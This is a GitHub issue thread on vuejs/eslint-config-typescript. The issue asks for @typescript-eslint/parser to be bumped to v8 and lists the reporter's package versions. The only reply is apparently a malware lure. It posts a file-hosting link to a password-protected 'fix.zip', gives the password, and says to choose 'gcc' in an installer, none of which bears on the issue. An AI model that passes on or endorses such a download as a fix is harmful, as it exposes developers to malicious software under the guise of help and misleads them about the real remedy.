### ISSUE TITLE
Bump @typescript-eslint/parser to v8

### ISSUE THREAD

**Issue by nagsterFVZ** [vuejs/eslint-config-typescript#80]
In my projects I am using:

- eslint: 9.9.1
- typescript: 5.5.4
- typescript-eslint: 8.2.0
- eslint-plugin-vue: 9.27.0
- @vue/eslint-config-typescript: 13.0.0

With basically no issues, except that certain types and enums are providing issues due to changes in typescript-estree.
- Issue for enums: https://github.com/typescript-eslint/typescript-eslint/pull/8920

These problem can be resolved with bumping @typescript-eslint/parser to ^8.0.0, without bumping @typescript-eslint/eslint-plugin as that causes breaking test. I have pulled the current v13 code locally and bumped the parser and the tests run fine.

I understand this is likely something that will be addressed in the update for eslint v9, but would be great if this can be bumped for the time being so that we can use the latest versions of those packages.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
